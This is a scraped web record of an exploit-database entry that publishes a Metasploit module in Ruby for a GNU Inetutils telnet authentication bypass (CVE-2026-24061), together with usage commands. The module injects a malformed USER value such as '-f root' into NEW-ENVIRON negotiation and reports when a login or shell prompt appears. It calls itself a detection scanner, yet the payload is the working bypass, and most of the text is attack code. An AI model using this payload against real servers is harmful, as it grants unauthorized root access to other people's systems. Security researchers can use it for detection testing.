{“lastseen”:”2026-01-28T17:54:54″,”description”:”GNU Inetutils version 2.7 telnet authentication bypass scanner that leverages a crafted USER value. This vulnerability is tracked as CVE-2026-24061 and is conceptually related to historical Telnet NEW-ENVIRON issues such as CVE-1999-0192, but affects…”,”published”:”2026-01-28T00:00:00″,”modified”:”2026-01-28T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 GNU Inetutils 2.7 Telnet Authentication Bypass Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:214468″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-1999-0192″,”CVE-2026-24061″],”sourceData”:”=============================================================================================================================================\\n | # Title : GNU Inetutils 2.7 Telnet NEW\u2011ENVIRON Authentication Bypass Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available. |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/214219\/ \\u0026 CVE-2026-24061 \\n \\n [+] Summary : This Metasploit auxiliary scanner detects a Telnet authentication bypass vulnerability related to improper handling of the NEW-ENVIRON option during Telnet negotiation. \\n The issue allows an attacker to inject a malformed USER environment variable (for example, using flags such as -f root) when the server requests environment variables. \\n \\t\\t\\t\\t Affected Telnet daemons may incorrectly trust this input, potentially bypassing password authentication and granting immediate shell access.\\n The module passively listens for the IAC SB NEW-ENVIRON SEND request, then responds with a crafted subnegotiation payload to test whether the target accepts the malicious USER value. \\n \\t\\t\\t\\t It verifies success by analyzing server responses for common indicators of a successful login or shell prompt. When exploitation indicators are detected, \\n \\t\\t\\t\\t the module reports the vulnerability in the Metasploit database.\\n This scanner is intended for security assessment and detection purposes against vulnerable Telnet servers, including implementations such as GNU Inetutils telnetd up to affected versions, \\n \\t\\t\\t\\t and aligns conceptually with historical NEW-ENVIRON authentication bypass issues (e.g., CVE-1999-0192 and related Telnet environment variable flaws).\\n \\n [+] Usage : \\n \\n # View available options\\n \\n show options\\n \\n # Set target(s)\\n \\n set RHOSTS \\u003ctarget_IP_or_range\\u003e\\n \\n # Example: set RHOSTS 192.168.1.1\\n \\n # Or for a range: set RHOSTS 192.168.1.1-254\\n \\n # Optional: Change port if Telnet is on non-standard port\\n \\n set RPORT 2323\\n \\n # Optional: Adjust timeout (default: 5 seconds)\\n \\n set TIMEOUT 10\\n \\n # Optional: Change payload (default: \\”-f root\\”)\\n \\n set USER_PAYLOAD \\”-f admin\\”\\n \\n [+] POC :\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n Rank = NormalRanking\\n \\n include Msf::Auxiliary::Scanner\\n include Msf::Auxiliary::Report\\n include Msf::Exploit::Remote::Telnet\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘Telnet NEW-ENVIRON Authentication Bypass Scanner’,\\n ‘Description’ =\\u003e %q{\\n This module scans Telnet servers for the historical NEW-ENVIRON\\n authentication bypass vulnerability (CVE-1999-0192).\\n \\n Vulnerable Telnet daemons may incorrectly process environment\\n variables supplied during NEW-ENVIRON negotiation. By injecting\\n a malformed USER value (e.g., \\”-f root\\”), authentication checks\\n may be bypassed.\\n \\n This module detects and confirms the bypass condition only.\\n It does NOT execute commands or create a session.\\n },\\n ‘Author’ =\\u003e\\n [\\n ‘indoushka’\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e\\n [\\n [‘CVE’, ‘1999-0192’],\\n [‘RFC’, ‘1572’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘1994-12-12’\\n ))\\n \\n register_options(\\n [\\n Opt::RPORT(23),\\n OptString.new(\\n ‘USER_PAYLOAD’,\\n [\\n true,\\n ‘Malformed USER environment value’,\\n ‘-f root’\\n ]\\n ),\\n OptInt.new(\\n ‘TIMEOUT’,\\n [\\n true,\\n ‘Timeout for Telnet negotiation (seconds)’,\\n 5\\n ]\\n )\\n ]\\n )\\n end\\n \\n def run_host(ip)\\n begin\\n connect\\n print_status(\\”#{ip}:#{rport} – Connected to Telnet service\\”)\\n \\n self.sock.telnet_options[:negotiation] = false\\n \\n new_environ_requested = false\\n \\n ::Timeout.timeout(datastore[‘TIMEOUT’]) do\\n loop do\\n data = sock.get_once(-1, 1)\\n break if data.nil?\\n \\n if data.include?(\\”\\\\xff\\\\xfa\\\\x27\\\\x01\\”)\\n new_environ_requested = true\\n print_good(\\”#{ip}:#{rport} – NEW-ENVIRON request detected\\”)\\n \\n buf = \\”\\\\xff\\\\xfa\\\\x27\\\\x00\\”\\n buf += \\”\\\\x00USER\\”\\n buf += \\”\\\\x01\\”\\n buf += datastore[‘USER_PAYLOAD’]\\n buf += \\”\\\\xff\\\\xf0\\”\\n \\n print_status(\\”#{ip}:#{rport} – Sending USER=#{datastore[‘USER_PAYLOAD’]}\\”)\\n \\n Rex.sleep(1)\\n response = sock.get_once(-1, datastore[‘TIMEOUT’])\\n \\n if response \\u0026\\u0026 response =~ \/(last login|welcome|login successful|[#\\\\$]\\u003e)\/i\\n print_good(\\”#{ip}:#{rport} – AUTHENTICATION BYPASS CONFIRMED\\”)\\n print_status(\\”#{ip}:#{rport} – Server response: #{response.strip}\\”)\\n \\n report_vuln(\\n host: ip,\\n port: rport,\\n proto: ‘tcp’,\\n name: self.name,\\n refs: self.references,\\n info: \\”Authentication bypass via NEW-ENVIRON (USER=#{datastore[‘USER_PAYLOAD’]})\\”\\n )\\n else\\n print_status(\\”#{ip}:#{rport} – Payload sent, but bypass not confirmed\\”)\\n end\\n \\n break\\n end\\n end\\n end\\n \\n unless new_environ_requested\\n print_error(\\”#{ip}:#{rport} – NEW-ENVIRON was not requested (likely not vulnerable)\\”)\\n end\\n \\n rescue ::Timeout::Error\\n print_error(\\”#{ip}:#{rport} – Timeout during Telnet negotiation\\”)\\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\\n rescue ::EOFError\\n print_error(\\”#{ip}:#{rport} – Server closed the connection\\”)\\n rescue ::Interrupt\\n raise\\n rescue ::Exception =\\u003e e\\n print_error(\\”#{ip}:#{rport} – Unexpected error: #{e.class} – #{e.message}\\”)\\n ensure\\n disconnect\\n end\\n end\\n end\\n \\n \\t\\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214468″,”cvss”:{“score”:10,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214468\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-28T17:54:54″,”description”:”GNU Inetutils version 2.7 telnet authentication bypass scanner that leverages a crafted USER value. This vulnerability is tracked as CVE-2026-24061 and is conceptually related to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-37899","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n